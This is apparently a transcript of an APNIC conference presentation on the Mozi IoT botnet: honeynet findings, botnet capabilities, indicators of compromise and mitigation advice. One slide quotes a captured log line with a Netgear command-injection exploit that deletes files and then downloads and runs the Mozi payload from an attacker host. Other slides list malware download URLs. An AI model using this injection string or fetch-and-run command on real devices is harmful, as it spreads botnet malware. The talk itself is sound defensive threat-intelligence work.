APNIC Senior Internet Security Specialist, Adli Wahid, presented on the Mozi botnet, what was observed and how it was mitigated at the 38th TWNIC OPM, held on 1 December 2022 in Taipei.
3. Discussion
1. Background
2. Mozi (IoT) Botnet
3. Observations
4. Vulnerabilities & Products
5. Mitigation & Remediation
Note: credits to Anutsetsen Enkhzoright anutsetsen.e@khanbank.com for initial work on the research &
presentation
3
4. Background (Source of Data)
• APNIC Community Honeynet Project
oCollaboration with partners across AP
• Honeypots & Honeynet
oAnything that interact with the honeypots is suspect
oConfirmed with observed actions + artifacts (payload, logs, etc)
oDefinitely not ’spoofed’ traffic
• Types of Honeypots
oTelnet/SSH (Cowrie) ** relevant for this talk
oOld vulnerabilities – i.e SMB (Dionaea)
4
5. What We Observe
• Attacks that spread via
oSSH & Telnet bruteforce
oExploiting _known_ vulnerabilities
• Nature of
oMalware - cryptominers, ddos agents, etc
oSource of attack == infected devices*
• Left of the Hack
oObservations on attacker’s infrastructure
oBot recruitments
oScripts, malware payload, traffic
• Attacks that no one pays attention to J
5
DDoS
Attack
timeline
Build/Buy Infrastructure
• Write malware
• Infect devices
• Setup Command & Control
“Left of the Hack”
“The Hack”
6. Mozi Botnet
• Discovered in September 2019 by Netlab
• Significant outbreak in Sept 2020 (100k
nodes)
• Targets IoT devices (MIPs, ARM, PPC and
x86)
• Uses unique P2P Command & Control
o BitTorrent Distributed Hash Table (DHT) as
carrier protocol
o Makes it robust & tricky* to track
• Some capabilities (from config)
o Perform a Ddos attack
o Update executable from given URL
o Execute command via shell or system()
o DNS Spoofing
o HTTP Session Hijacking (with JS)
o Mining
• Code base from other botnets
o Gafgyt
o Mirai
• Propagation
o 14 HTTP based exploits of via web
interface of IoT Devices
o Mainly Telnet**, FTP, SSH credentials
brute-force
6
7. 7
Nmap scan report for host-x.static.kbtelecom.net
(219.x.y.184)
Host is up (0.062s latency).
PORT STATE SERVICE VERSION
53387/tcp open elf-exe ELF 32-bit executable file
This host was serving malware (http on port 53387). Shodan fingerprint the device as a DVR
9. Mozi Author ”taken custody” by LEA in 2021
https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
Is it still
around?
9
10. 2022 - Still Active?
durian.fsck.my -- 93.56.202.158[10/Oct/2022:14:24:55 +0900]
"GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-
rf+/tmp/*;
wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear;
sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 301 0
Check your webserver logs for Mozi.a or Mozi.m
10
11. Observations in APNIC Honeynet Project
• In 05/2022, we observed an ELF binary “.i” in some URLs
o Post-login downloads
• Pattern looks familiar http://xxx.xxx.xxx.xxx:random_port/.i
• IP in URL can be the same as attacking host or different
Source IP (attacking/spreading) IP hosting binary:random_port
o2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766
o2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134
o2022-05-26T03:46:12.338083,114.34.185.8,hxxp://114.34.185.8:11470/.i,TW,3462
o2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724
o2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224
o2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764
o2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134
o2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273
11
1. Telnet username:password
2. wget http://x.x.x.x:nnnn/.1
12. The “.i” & Finding Mozi
o .i: ELF 32-bit LSB executable,
ARM, EABI5 version 1 (GNU/Linux),
statically linked, stripped
• SHA256
a04ac6d98ad989312783d4fe3456c53730
b212c79a426fb215708b6c6daa3de3
o Known to VirusTotal
• Finding Mozi
• Maybe we can find Mozi.m or Mozi.a on
the webserver?
o If .i in $IP:PORT
o Then download $IP:PORT/mozi.a
|| $IP:PORT/mozi.m ||
$IP:PORT/Mozi.m ||
$IP:PORT/Mozi.a ||
$IP:PORT/config
12
15. IP from TW – last 6 months
[Snippet]
2022-11-29T00:41:00.077072,60.x.y.205,hxxp://60.x.y.205:61756/.i,TW,3462
2022-11-29T08:49:20.515523,59.x.y.10,hxxp://59.x.y.10:12819/.i,TW,3462
2022-11-29T09:01:48.079099,220.x.y.53,hxxp://220.x.y.53:29971/.i,TW,3462
2022-11-29T17:53:40.465965,49.x.y.24,hxxp://49.x.y.24:45704/.i,TW,18049
2022-11-30T15:48:10.382224,123.x.y.244,hxxp://171.x.y.95:39821/.i,TW,131596
15
17. Mitigation & Remediation (not just Mozi)
• To prevent
o Spread
o Impact (i.e. DDoS, Redirect , Mining)
• The Usual Advice
o Harden Device – Patch, Strong Credentials
o But whose job is it anyways?
• Proactive – Monitor, Respond & Share***
o Get Feeds on Infected Devices
o Sources of Feeds – ShadowServer Foundation, DASH/APNIC Honeynet,
Abuse.CH ThreatFox
o Have a response plan
• Threat awareness
o Attackers build infrastructure before attacking
o Don’t wait for an attack to happen
17